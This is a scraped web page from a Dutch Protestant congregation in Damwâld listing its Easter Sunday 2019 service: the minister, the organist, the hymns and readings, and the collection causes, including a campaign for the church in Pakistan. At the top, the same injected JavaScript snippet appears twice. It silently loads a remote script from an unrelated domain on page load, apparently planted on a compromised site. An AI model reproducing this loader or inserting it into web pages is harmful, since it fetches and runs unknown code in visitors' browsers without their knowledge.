;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eerste Paasdag - PKN Damwâld
zondag 21 april 2019
14:00 uur

Eerste Paasdag

Informatie

Voorganger:Mw. R. van der Wal-Akker, Morra
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Gezang 218
Welkom
We zingen: Psalm 98 : 1 en 3
Stil Gebed en Woord van Verwachting
We zingen: Elb 299
Gebed
We zingen: Elb 122 : 1 en 2
We lezen: Johannes 20 : 1-18
We zingen: Elb 122 : 3 en 4
Verkondiging .
We zingen: Elb 125
Dankgebed en voorbede
Collecte
We zingen: Gezang 215
Geloofsbelijdenis
Slotlied Elb 411
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Versterk de kerk in Pakistan

Pasen: Versterk de kerk in Pakistan
Veel christenen in Pakistan voelen zich kwetsbaar en onzeker. Zij vormen een minderheid en behoren tot de laagste klasse, de armste bevolkingsgroepen. Veel christenen hebben bovendien weinig kennis over het christelijk geloof. Kerk in Actie bouwt samen met lokale kerken aan een sterke en vernieuwende kerk in Pakistan. Studenten en voorgangers kunnen, onder meer via internet, cursussen en trainingen volgen over discipelschap en theologie. Jaarlijks volgen 6.000 tieners een jongerentraining. Zij zijn het toekomstig kader van de kerk en staan dankzij deze training sterker in hun geloof. Bouw met uw Paascollecte mee aan een sterke en vernieuwende kerk in Pakistan.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds